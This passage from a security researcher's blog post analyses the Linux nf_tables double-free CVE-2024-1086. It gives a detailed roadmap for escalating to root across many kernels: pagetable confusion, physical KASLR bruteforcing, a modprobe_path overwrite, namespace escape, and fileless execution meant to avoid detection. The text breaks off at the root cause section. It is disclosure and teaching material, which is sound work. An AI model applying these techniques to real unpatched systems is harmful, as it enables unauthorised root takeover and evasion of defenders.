Pwning Tech

Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques

notselwyn — Tue, 26 Mar 2024 11:45:00 GMT

This blogpost is the next instalment of my series of hands-on no-boilerplate vulnerability research blogposts, intended for time-travellers in the future who want to do Linux kernel vulnerability research. Specifically, I hope beginners will learn from my VR workflow and the seasoned researchers will learn from my techniques.

In this blogpost, I'm discussing a bug I found in nf_tables in the Linux kernel (CVE-2024-1086) and its root cause analysis. Then, I show several novel techniques I used to drop a universal root shell on nearly all Linux kernels between at least v5.14 and v6.6.14 (unpriv userns required) without even recompiling the exploit. This is possible because of the data-only, KSMA ambience of the exploit. Among those targeted kernels are Ubuntu kernels, recent Debian kernels, and one of the most hardened Linux kernels out there (KernelCTF mitigation kernels).

Additionally, I'm providing the proof-of-concept source code (also available in the CVE-2024-1086 PoC repository on Github). As a bonus, I wanted to challenge myself by making the exploit support fileless execution (which helps in CNO and avoids detections in pentests), and by not making any changes to the disk whatsoever (including setting /bin/sh to SUID 0 et cetera).

This blogpost aims to be a supplementary guide to the original Dirty Pagetable blogpost as well, considering there were not any blogposts covering the practical bits (e.g. TLB flushing for exploits) when I started writing this blogpost. Additionally, I hope the skb-related techniques will be embedded in remote network-based exploits (e.g. bugs in IPv4, if they still exist), and I hope that the Dirty Pagedirectory technique will be utilized for LPE exploits. Let's get to the good stuff!

Blogpost image cover: birdseye view of exploit including the vulnerability and some of the techniques for visual purposes.

0. Before you read

0.1. How to read this blogpost

To the aspiring vulnerability researchers: I wrote this blogpost in a way that slightly represents a research paper in terms of the format, because the format happens to be exactly what I was looking for: it is easy to scan and cherrypick knowledge from even though it may be a big pill to swallow. Because research papers are considered hard to read by many people, I'd like to give steps on how I would read this blogpost to extract knowledge efficiently:

Read the overview section (check if the content is even interesting to you)
Split-screen this blogpost (reading and looking up)
Skip to the bug section (try to understand how the bug works)
Skip to the proof of concept section (walk through the exploit)

If things are not clear, utilize the background and/or techniques section. If you want to learn more about a specific topic, I have attached an external article for most sections.

0.2. Affected kernel versions

This section contains information about the affected kernel versions for this exploit, which is useful when looking up existing techniques for exploiting a bug. Based on these observations, it seems feasable that all versions from atleast (including) v5.14.21 to (including) v6.6.14 are exploitable, depending on the kconfig values (details below). This means that at the time of writing, the stable branches linux-5.15.y, linux-6.1.y, and linux-6.6.y are affected by this exploit, and perhaps linux-6.7.1 as well. Fortunately for the users, a bugfix in the stable branches has been released in February 2024.

Note that the same base config file was reused for most vanilla kernels, and that the mentioned versions are all vulnerable to the PoC bug. The base config was generated with kernel-hardening-checker. Additionally, if a version isn't affected by the bug, yet the exploitation techniques work, it will not be displayed in the table.

For vanilla kernels, CONFIG_INIT_ON_FREE_DEFAULT_ON was toggled off in the config, which sets a page to null-bytes after free - which thwarts the skb part of for the exploit. This config value is toggled off in major distro's like KernelCTF, Ubuntu, and Debian, so I consider this an acceptable measure. However, CONFIG_INIT_ON_ALLOC_DEFAULT_ON remains toggled on, as this is part of the Ubuntu and Debian kernel config. Unfortunately, this causes bad_page() detection as an side-effect in versions starting from v6.4.0. When CONFIG_INIT_ON_ALLOC_DEFAULT_ON is toggled off, the exploit is working up to (including) v6.6.4.

The success rate for the exploit is 99.4% (n=1000) - sometimes with drops to 93.0% (n=1000) - on Linux kernel v6.4.16, with the setup as below (and the kernelctf filesystem). I do not expect the success rate to deviate much across versions, although it might deviate per device workload. I consider an exploit working for a particular setup if it succeeds all attempts at trying it out (manual verification, so usually 1-2 tries). Because of the high success rate, it is pretty easy to filter out if the exploit works or not. Additionally, all fails have been investigated and hence have their reasons been included in the table, so false positives are unlikely.

All non-obsolete techniques (and the resulting PoC) are tested on setups:

| Kernel | Kernel Version | Distro    | Distro Version    | Working/Fail | CPU Platform      | CPU Cores | RAM Size | Fail Reason                                                                           | Test Status | Config URL                                                                                                                               |
|--------|----------------|-----------|-------------------|--------------|-------------------|-----------|----------|---------------------------------------------------------------------------------------|-------------|------------------------------------------------------------------------------------------------------------------------------------------|
| Linux  | v5.4.270       | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [CODE] pre-dated nft code (denies rule alloc)                                         | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.4.270.config               |
| Linux  | v5.10.209      | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [TCHNQ] BUG mm/slub.c:4118                                                            | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.10.209.config              |
| Linux  | v5.14.21       | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.14.21.config               |
| Linux  | v5.15.148      | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.15.148.config              |
| Linux  | v5.16.20       | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.16.20.config               |
| Linux  | v5.17.15       | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.17.15.config               |
| Linux  | v5.18.19       | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.18.19.config               |
| Linux  | v5.19.17       | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.19.17.config               |
| Linux  | v6.0.19        | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.0.19.config                |
| Linux  | v6.1.55        | KernelCTF | Mitigation v3     | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-kernelctf-mitigationv3-v6.1.55.config |
| Linux  | v6.1.69        | Debian    | Bookworm 6.1.0-17 | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-debian-v6.1.0-17-amd64.config         |
| Linux  | v6.1.69        | Debian    | Bookworm 6.1.0-17 | working      | AMD Ryzen 5 7640U | 6         | 32GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-debian-v6.1.0-17-amd64.config         |
| Linux  | v6.1.72        | KernelCTF | LTS               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-kernelctf-lts-v6.1.72.config          |
| Linux  | v6.2.?         | Ubuntu    | Jammy v6.2.0-37   | working      | AMD Ryzen 5 7640U | 6         | 32GiB    | n/a                                                                                   | final       |                                                                                                                                          |
| Linux  | v6.2.16        | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.2.16.config                |
| Linux  | v6.3.13        | n/a       | n/a               | working      | QEMU x86_64       | 8         | 16GiB    | n/a                                                                                   | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.3.13.config                |
| Linux  | v6.4.16        | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.4.16.config                |
| Linux  | v6.5.3         | Ubuntu    | Jammy v6.5.0-15   | fail         | QEMU x86_64       | 8         | 16GiB    | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-ubuntu-jammy-v6.5.0-15.config         |
| Linux  | v6.5.13        | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.5.13.config                |
| Linux  | v6.6.14        | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.6.14.config                |
| Linux  | v6.7.1         | n/a       | n/a               | fail         | QEMU x86_64       | 8         | 16GiB    | [CODE] nft verdict value incorrect is altered by kernel                               | final       | https://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.7.1.config                 |

Table 0.2.1: An overview of the exploit test results per tested kernel versions and their setups.

1. Overview

1.1. Abstract

In this blogpost I present several novel techniques I used to exploit a 0-day double-free bug in hardened Linux kernels (i.e. KernelCTF mitigation instances) with 93%-99% success rate. The underlying bug is input sanitization failure of netfilter verdicts. Hence, the requirements for the exploit are that nf_tables is enabled and unprivileged user namespaces are enabled. The exploit is data-only and performs an kernel-space mirroring attack (KSMA) from userland with the novel Dirty Pagedirectory technique (pagetable confusion), where it is able to link any physical address (and its permissions) to virtual memory addresses by performing just read/writes to userland addresses.

1.2. Workflow

To trigger the bug leading to the double-free, I add a Netfilter rule to an unprivileged-user namespace. The Netfilter rule contains an expression which sets a malicious verdict value, which will make the internal nf_tables kernel code interpret NF_DROP at first, after which it will free the skb, and then return NF_ACCEPT so the packet handling continues, and it will double-free the skb. Then, I trigger this rule by allocating an 16-page IP packet (so that it gets allocated by the buddy-allocator and not the PCP-allocator or slab-allocator, and it shares a cache across CPUs) which has migratetype 0.

In order to delay the 2nd free (so I can avoid corruption by doing stuff), I abuse the IP fragmenation logic of an IP packet. This allows us to make an skb "wait" in an IP fragmentation queue without being freed for an arbitrary amount of seconds. In order to traverse this code path with corrupted packet metadata, I spoof IP source address 1.1.1.1 and destination address 255.255.255.255. However, this means we get to deal with Reverse Path Forwarding (RPF), so we need to disable it in our networking namespace (does not require root privileges).

To achieve unlimited R/W to any physical memory address (including kernel addresses), I present the Dirty Pagedirectory technique. This technique is - softly said - pagetable confusion, by allocating an PTE page and PMD page to the same physical page.

Unfortunately, these pagetable pages are migratetype==0 order==0 pages allocated with alloc_pages(), and skb heads (the double-free'd objects) are allocated with kmalloc, which means the slab-allocator is used for page order<=1, the PCP-allocator is used for order<=3, and the buddy-allocator for order>=4. To avoid hassle (explained in detail in the blogpost), we have to use order>=4 pages for the double-free. This also means we cannot directly use a double-free on buddy-allocator pages (order>=4) to double allocate PTE/PMD pages (order==0), but I discovered methods to achieve this.

To double allocate PTE/PMD pages with the kmalloc-based double-free, I present 2 methods:

The better page conversion technique (PCP draining)
In this simpler, more stable, and faster method we take advantage of the fact that the PCP-allocator is simply a per-CPU freelist, which is refilled with pages from the buddy-allocator when it is drained. Hence, we can simply free order==4 (16) pages to the buddy-allocator freelist, drain the PCP list, and refill the order==0 PCP list with 64 pages from the buddy-allocator freelist, containing said 16 pages.

The original page conversion technique (racecondition)
This method relies on a race-condition and hence only works in virtualized environments such as QEMU VMs, where terminal IO causes a substantial delay in the VMs kernel. We take advantage of a WARN() message which causes ~50-300ms delay to trigger a race condition, to free an order==4 buddy page to an order==0 PCP freelist. As you may notice, this does not work on real hardware (as the delay is ~1ms) and is therefore replaced with the method above. Unfortunately, I used this technique for the original kernelctf exploit.

Between the double-free, I make sure the page refcounts never go to 0 since it would deny freeing the page (possibly as a double-free mitigation). Additionally, I spray skb objects into the skbuff_head_cache slabcache of the same CPU to avoid experimental freelist corruption detection in the kernelctf mitigation instance, and to increase stability in general.

When the double-free primitive is achieved, I will use a new technique called Dirty Pagedirectory to achieve unlimited read/write to any physical address. This requires double-allocating a page table entry (PTE) page and a page middle directory (PMD) page to the same address. When writing an arbitrary PTE value containing page permissions and page physical address to a page within the span of the PTE page, the PMD page will interpret said address when trying to dereference the PTE value's page within the PMD pages' span. This boils down to setting a PTE value to 0xDEADBEEF entirely from userland, and then dereference that PTE value from userland again to access the page referenced to by 0xDEADBEEF using the flags (including but not limited to permissions) set in 0xDEADBEEF.

In order to utilize this unlimited R/W primitive, we need to flush the TLB. After reading several impractical research papers I came up with my own complex flushing algorithm to flush TLBs in Linux from userland: calling fork() and munmap()'ing the flushed VMA. In order to avoid crashes when the child exits the program, I make the child thread go to sleep indefinitely.

I utilize this unlimited physical memory access to bruteforce physical KASLR (which is accelerated because the physical kernel base is aligned with CONFIG_PHYSICAL_START (a.k.a. 0x100'0000 / 16MiB) or - when defined - CONFIG_PHYSICAL_ALIGN (a.k.a. 0x20'0000 / 2MiB) and leak the physical kernel base address by checking 2MiB worth of pages on a machine with 8GiB memory (assuming 16MiB alignment), which even fits into the area of a single overwritten PTE page. To detect the kernel, I used the get-sig scripts which generate a highly precise fingerprint of files, like recent Linux kernels across compilers, and slapped that into my exploit.

In order to find modprobe_path, I do a fairly simplistic "/sbin/modprobe" + "\x00" * ... memory scan across 80MiB beyond the detected kernel base to get access to modprobe_path. To verify that the "real" modprobe_path variable was found instead of a false-positive, I overwrite modprobe_path and check if /proc/sys/kernel/modprobe (read-only user interface for modprobe_path) reflects this change. If CONFIG_STATIC_USERMODEHELPER is enabled, it will just check for "/sbin/usermode-helper".

In order to drop a root shell (including an namespace escape) I overwrite modprobe_path or "/sbin/usermode-helper" to the exploits' memfd file descriptor containing the privesc script, such as /proc//fd/. This fileless approach allows the exploit to be ran on an entire read-only filesystem (it being bootstrapped using perl). The PID has to be bruteforced if the exploit is running in a namespace - because the exploit only knows the namespace PID - but is luckily incredibly fast since we don't need to flush the TLB as we aren't changing the physical address of the PTE. This will essentially be writing the string to a userland address and executing a file.

In the privesc script, we will execute a /bin/sh process (as root) and hook the exploits' file descriptors (/dev//fd/) to the shells' file descriptors, allowing us to achieve a namespace escape. The advantage of this method is that it's very versatile, as it works on local terminals and reverse shells, all without depending on filesystems and other forms of isolation.

2. Background info

2.1. nf_tables

One of the in-tree Linux kernel modules is nf_tables. In recent versions of iptables - which is one of the most popular firewall tools out there - the nf_tables kernel module is the backend. iptables itself is part of the ufw backend. In order to decide which packets will pass the firewall, nftables uses a state machine with user-issued rules.

2.1.1. Netfilter Hierarchy

These rules come in the following orders (i.e. one table contains many chains, one chain contains many rules, one rule contains many expressions):

Tables (which protocol)
Chains (which trigger)
Rules (state machine functions)
Expressions (state machine instructions)

Illustration 2.1.1.1: Nftables hierarchy overview of tables, chains, rules and expressions.

This allows users to program complex firewall rules, because nftables has many atomic expressions which can be chained together in rules to filter packets. Additionally, it allows chains to be ran at different times in the packet processing code (i.e. before routing and after routing) which can be selected when creating a chain using flags like NF_INET_LOCAL_IN and NF_INET_POST_ROUTING. Due to this extremely customizable nature, nftables is known to be incredibly insecure. Hence, many vulnerabilities have been reported and have been fixed already.

To learn more about nftables, I recommend this blogpost by @pqlqpql which goes into the deepest trenches of nftables: "How The Tables Have Turned: An analysis of two new Linux vulnerabilities in nf_tables."

2.1.2. Netfilter Verdicts

More relevant to the blogpost are Netfilter verdicts. A verdict is a decision by a Netfilter ruleset about a certain packet trying to pass the firewall. For example, it may be a drop or an accept. If the rule decides to drop the packet, Netfilter will stop processing the packet. On the contrary, if the rule decides to accept the packet, Netfilter will continue processing the packet until the packet passes all rules. At the time of writing, all the verdicts are:

NF_DROP: Drop the packet, stop processing it.
NF_ACCEPT: Accept the packet, continue processing it.
NF_STOLEN: Stop processing, the hook needs to free it.
NF_QUEUE: Let userland application process it.
NF_REPEAT: Call the hook again.
NF_STOP (deprecated): Accept the packet, stop processing it in Netfilter.

2.2. sk_buff (skb)

To describe network data (including IP packets, ethernet frames, WiFi frames, etc.) the Linux kernel uses the sk_buff structure and commonly calls them skb's as shorthand. To represent a packet, the kernel uses 2 objects which are important to us: the sk_buff object itself which contains kernel meta-data for skb handling, and the sk_buff->head object which contains the actual packet content like the IP header and the IP packets' body.

Illustration 2.2.1: Overview of the sk_buff structure's data buffer and its length field.

In order to use values from the IP header (since IP packets are parsed in the kernel afterall), the kernel does type punning with IP header struct and the sk_buff->head object using ip_hdr(). This pattern gets applied across the kernel since it allows for quick header parsing. As a matter of fact, the type punning trick is also used to parse ELF headers when executing a binary.

To learn more, check this excelent Linux kernel documentation page: "struct sk_buff - The Linux Kernel."

2.3. IP packet fragmentation

One of the features of IPv4 is packet fragmentation. This allows packets to be transmitted using multiple IP fragments. Fragments are just regular IP packets, except that they do not contain the full packet size specified in its IP header and it having the IP_MF flag set in the header.

The general calculation for the IP packet length in an IP fragments' header is iph->len = sizeof(struct ip_header) * frags_n + total_body_length. In the Linux kernel, all fragments for a single IP packet are stored into the same red-black tree (called an IP frag queue) until all fragments have been received. In order to filter out which fragment belongs at which offset when reassembling, the IP fragment offset is required: iph->offset = body_offset >> 3, whereby body_offset is the offset in the final IP body, and thus excluding any IP header lengths which may be used when calculating iph->len. As you may notice, fragment data has to be aligned with 8 bytes because the specs specify that the upper 3 bits of the offset field are used for flags (i.e. IP_MF and IP_DF). If we want to transmit 64 bytes of data across 2 fragments whose size are respectively 8 bytes and 56 bytes, we should format it like the code below. The kernel would then reassemble the IP packet as 'A' * 64.

iph1->len = sizeof(struct ip_header)*2 + 64;
iph1->offset = ntohs(0 | IP_MF); // set MORE FRAGMENTS flag 
memset(iph1_body, 'A', 8); 
transmit(iph1, iph1_body, 8); 

iph2->len = sizeof(struct ip_header)*2 + 64; 
iph2->offset = ntohs(8 >> 3); // don't set IP_MF since this is the last packet 
memset(iph2_body, 'A', 56); 
transmit(iph2, iph2_body, 56);

Codeblock 2.3.1: C psuedocode describing the IP header format of IP fragments.

To learn more about packet fragmentation, check this blogpost by PacketPushers: "IP Fragmentation in Detail."

2.4. Page allocation

There are 3 major ways to allocate pages in the Linux kernel: using the slab-allocator, the buddy-allocator and the per-cpu page (PCP) allocator. In short: the buddy-allocator is invoked with alloc_pages(), can be used for any page order (0->10), and allocates pages from a global pool of pages across CPUs. The PCP-allocator is also invoked with alloc_pages(), and can be used to allocate pages with order 0->3 from a per-CPU pool of pages. Additionally, there's the slab-allocator, which is invoked with kmalloc() and can allocate pages with order 0->1 (including smaller allocations) from specialized per-CPU freelists/caches.

The PCP-allocator exists because the buddy-allocator locks access when a CPU is allocating a page from the global pool, and hence blocks another CPU when it wants to allocate a page. The PCP-allocator prevents this by having a smaller per-CPU pool of pages which are allocated in bulk by the buddy-allocator in the background. This way, the chance of page allocation blockage is smaller.

Illustration 2.4.1: Overview of available page allocators per order.

Illustration 2.4.2: Activity diagram of the page allocation process, starting from kmalloc().

To learn more about the buddy-allocator and the PCP-allocator, check the Page Allocation section of this extensive analysis: "Reference: Analyzing Linux kernel memory management anomalies."

2.5. Physical memory

2.5.1. Physical-to-virtual memory mappings

One of the most fundamental elements of the kernel is memory management. When we are talking about memory, we could be talking about 2 types of memory: physical memory and virtual memory. Physical memory is what the RAM chips use, and virtual memory is how programs (including the kernel) running on the CPU interact with the physical memory. Of course when we use gdb to debug a binary, all addresses we use are virtual - since gdb and the underlying program is such a program as well.

Essentially, virtual memory is built on top of physical memory. The advantage of this model is that the virtual address range is larger than the physical address range - since empty virtual memory pages can be unmapped - which is good for ASLR efficiency among other things. Additionally, we can map 1 physical page to many virtual pages, or let there be an illusion that there are 128TiB addresses whilst in practice most of these are not backed by an actual page.

This means that we can work with 128TiB virtual memory ranges per process on a system with only 4GiB of physical memory. In theory, we could even map a single physical page of 4096 \x41 bytes to all 128TiB worth of userland virtual pages. When a program wants to write a \x42 byte to a virtual page, we perform copy-on-write (COW) and create a 2nd physical page and map that page to just the virtual page that the program wrote to.

Illustration 2.5.1.1: Mappings between virtual and physical memory pages.

In order to translate virtual memory addresses to physical memory addresses, the CPU utilizes pagetables. So when our userland program tries to read (virtual memory) address 0xDEADBEEF, the CPU will essentially do mov rax, [0xDEADBEEF]. However, in order to actually read the value from the RAM chips, the CPU needs to convert the virtual memory address 0xDEADBEEF to an physical memory address.

This translation is oblivious to the kernel and our userland program when it is trying to access a virtual memory address. To perform this translation, the CPU performs a lookup in the Translation Lookaside Buffer (TLB) - which exists in the MMU - which caches the virtual-to-physical address translations. If the virtual 0xDEADBEEF address (or more specifically, the virtual 0xDEADB000 page) has been recently accessed, the TLB does not have to traverse the pagetables (the next section), and will have the physical address beloning to the virtual address in cache. Otherwise, if the address is not in the TLB cache, the TLB needs to traverse the pagetables to get the physical address. This will be covered in the next subsection.

To learn more about physical memory, check this excellent memory layout page from a Harvards Operating Systems course.

2.5.2. Pagetables

When the TLB gets requested a physical address for a virtual address which is not in its cache, it performs a "pagewalk" to acquire the physical address of a virtual address. A pagewalk means traversing the pagetables, which are a few nested arrays, with the physical addresses in the bottom arrays.

Note that the diagram below uses pagetable indices of 9 bits (because 2**9 = 512 pagetable values fit into a single page). Additionally, we are using 4-level pagetables here, but the kernel also supports 5-level, 3-level, et cetera.

Illustration 2.5.2.1: An example of virtual address to physical address translation.

This model of nested arrays is used because it saves a lot of memory. Instead of allocating a huge array for 128TiB of virtual addresses, it instead divides it into several smaller arrays with each layer having a smaller bailiwick. This means that tables responsible for an unallocated area will not be allocated.

Traversing the pagetables is a very inexpensive process since it are essentially 4-5 array dereferences. The indices for these dereferences are - get ready to have your mind blown - embedded in the virtual address. This means that a virtual address is not an address, but pagetable indices with a prefixed canonical. This elegant approach allows for O(1) physical address retrieval, since array dereferences are O(1) and the bit shifting to recover for the index is O(1) as well. Unfortunately, pagetables would need to be traversed very often which would make even these array dereferences slow. Hence, the TLB is implemented.

In terms of practicality, the TLB needs to find the pagetables in physical memory to pagewalk them. The address for the root of the userland pagetable hierarchy (PGD) of the running process is stored in the privileged CR3 register in the corresponding CPU core. 'Privileged' means that the register can only be accessed from kernelspace, as userland accesses will lead to a permission error. When the kernel scheduler makes the CPU switch to another process context, the kernel will set the CR3 register to virt_to_phys(current->mm->pgd).

To learn more about how the MMU finds the location of the pagetable hierarchy when the CPU needs to do a TLB lookup with cache miss, check the Wikipedia page on control registers.

2.6. TLB Flushing

TLB Flushing is the practice of, well, flushing the TLB. The translation lookaside buffer (TLB) caches translations between virtual addresses and physical addresses. This practice delivers a huge performance increase as the CPU doesn't have to traverse the pagetables anymore and can instead lookaside to the TLB.

When an virtual addresses' pagetable hierarchy changes in kernelspace, it needs to be updated in the TLB as well. This is invoked manually from the kernel by doing function calls in the same functions where the pagetables are changed. These functions "flush" the TLB, which empties the translation cache (possibly only for a certain address range) of the TLB. Then, the next the virtual address is accessed, the TLB will save the translation to the TLB cache.

However, sometimes we change the pagetables (and their virtual addresses) in exploits at times where that's not expected. An example of this is using a UAF write bug to overwrite a PTE. At that time, the TLB flushing functions in the kernel are not called, since we are not using the functions to change the page tables, which do invoke said functions. Hence, we need to flush the TLB indirectly from userland. Otherwise, the TLB would contain outdated cache entries. In the techniques section of this blogpost I present my own method of doing this.

To learn more about the TLB, check the Wikipedia article: "Translation lookaside buffer - Wikipedia."

2.7. Dirty Pagetable

Dirty Pagetable is a novel technique presented by N. Wu, which boils down to overwriting PTEs in order to perform an KSMA attack. Their research paper presents 2 scenarios to overwrite PTEs: a double-free bug and an UAF-write bug. Both scenarios are supplemented with a practical example. The original paper is definitely worth a read considering I learned a lot from it.

Illustration 2.7.1: An high-level overview of the Dirty Pagetable technique.

However, there are a few critical topics out-of-scope in the original paper, which I try to include in this blogpost. An example of those topics is how pagetables work, TLB flushing, proof-of-concept code, the workings of physical KASLR, and the format of PTE values. Additionally, I present a variation on this technique (Dirty Pagedirectory) in this blogpost.

To learn more, check the original research paper by N. Wu: "Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel."

2.8. Overwriting modprobe_path

One of the more classical privilege escalation techniques is overwriting the modprobe_path variable in the kernel. The value of the variable is set to CONFIG_MODPROBE_PATH at compile-time, and is padded to KMOD_PATH_LEN bytes with nullbytes. Usually CONFIG_MODPROBE_PATH is set to "/sbin/modprobe" as that is the usual filepath for the modprobe binary.

The variable is used when a user is trying execute a binary with an unknown magic bytes header. For instance, the magic bytes of an ELF binary are FE45 4C46 (a.k.a. ".ELF"). When executing the binary, the kernel will look for registered binary handlers which match said magic bytes. In the case of ELF, the ELF binfmt handler is selected. However when a registered binfmt is not recognized, modprobe will be invoked using the path stored in modprobe_path and it will query for a kernel module with the name binfmt-%04x, where %04x is the hex representation of the first 2 bytes in the file.

Illustration 2.8.1: Analysis of the modprobe_path privilege escalation technique.

To exploit this, we can overwrite the value of modprobe_path with a string of the path of a privilege escalation script (which gives /bin/sh root SUID for instance), and then invoke modprobe by trying to execute a file with an invalid format such as ffff ffff. The kernel will then run /tmp/privesc_script.sh -q -- binfmt-ffff as root, which allows us to run any code as root. This saves us the hassle of having to run kernel functions ourselves, and instead allows easy privesc by overwriting a string.

Somewhere along the line, the CONFIG_STATIC_USERMODEHELPER_PATH mitigation was introduced, which makes overwriting modprobe_path useless. The mitigation works by setting every executed binary's path to a busybox-like binary, which behaves differently based on the argv[0] filename passed. Hence, if we overwrite modprobe_path, only this argv[0] value would differ, which the busybox-like binary does not recognize and hence would not execute.

The exploit presented in this exploit works both with and without CONFIG_STATIC_USERMODEHELPER_PATH, because we can simply overwrite the read-only "/sbin/usermode-helper" string in kernel memory.

To learn more about the modprobe_path technique, check this useful page on Github by user Smallkirby: "modprobe_path.md · smallkirby/kernelpwn."

2.9. KernelCTF

KernelCTF is a program ran by Google with the intent of disclosing new exploitation techniques for (hardened) Linux kernels. It's also a great way to get an ethical bounty for any vulnerabilities you may have in the Linux kernel, as the bounties range from $21.337 anywhere up to $111.337 and even more, all depending on the scope of the vulnerability and if there are any novel techniques.

The major outlines are that there are 3 machine categories: LTS (long-term stable kernel hardened with existing mitigations), mitigation (kernel hardened with experimental mitigations on top of existing mitigations), and COS (container optimized OS). Each machine can be hacked once per version, and the researcher who hacked the machine first gets the reward. This means that if researcher A hacked LTS version 6.1.63, then researcher A and researcher B can still hack mitigation version 6.1.63. After the next version is released on the KernelCTF platform (typically after 2 weeks), both researcher A and researcher B can hack LTS version 6.1.65 again. However, the bug reported by researcher A for version 6.1.63 will most likely be fixed now, and would be treated like a duplicate anyways if it were to be exploited again.

In order to "hack" the KernelCTF machine, the researcher needs to read the /flag file in the root (jail host) namespace, which is only readable by the root user. As you may expect, this may require both a namespace sandbox (nsjail) escape as well as an privilege escalation to the root user. At the end of the day, this does not matter as long as the flag is captured.

To debug the environment, check the local_runner.sh script which the KernelCTF team provides. Note the --root flag, which allows you to run a root shell from outside of the jail.

To learn more about the KernelCTF program, check this page: "KernelCTF rules | security-research."

3. The bug

3.1. Finding the bug

It all started when I wanted to implement firewall bypasses into my ORB rootkit Netkit. I wanted to rely on the kernel API (exported functions) for any actions, as it would have the same compatibility as regular kernel modules. Hopefully, this would mean that the rootkit kernel module could be used across architectures and kernel versions, without having to change the source code.

This led me into the rabbit hole called Netfilter. Before this research, I had no practical experience with Netfilter, so I had to do a lot of research on my own. Gladfully, there is plenty of documentation available from both the kernel developers and the infosec community. After reading myself into the subsystem, I read a bunch of source code from the top down related to nf_tables rules and expressions.

While reading nf_tables code - whose state machine is very interesting from a software development point of view - I noticed the nf_hook_slow() function. This function loops over all rules in a chain and stops evaluation (returns the function) immediately when NF_DROP is issued.

In the NF_DROP handling, it frees the packet and it allows a user to set the return value using NF_GET_DROPERR(). With this knowledge I made the function return NF_ACCEPT using the drop error when handling NF_DROP. A bunch of kernel panics and code path analyses later, I found a double-free primitive.

// looping over existing rules when skb triggers chain
int nf_hook_slow(struct sk_buff *skb, struct nf_hook_state *state,
		 const struct nf_hook_entries *e, unsigned int s)
{
	unsigned int verdict;
	int ret;

	// loop over every rule
	for (; s < e->num_hook_entries; s++) {
		// acquire rule's verdict
		verdict = nf_hook_entry_hookfn(&e->hooks[s], skb, state);

		switch (verdict & NF_VERDICT_MASK) {
		case NF_ACCEPT:
			break;  // go to next rule
		case NF_DROP:
			kfree_skb_reason(skb, SKB_DROP_REASON_NETFILTER_DROP);

			// check if the verdict contains a drop err
			ret = NF_DROP_GETERR(verdict);
			if (ret == 0)
				ret = -EPERM;

			// immediately return (do not evaluate other rules)
			return ret;

		// [snip] alternative verdict cases
		default:
			WARN_ON_ONCE(1);
			return 0;
		}
	}

	return 1;
}

Codeblock 3.1.1: The nf_hook_slow() kernel function written in C, which iterates over nftables rules.

3.2. Root cause analysis

The root cause of the bug is quite simplistic in nature, as it is an input sanitization bug. The impact of this is a stable double-free primitive.

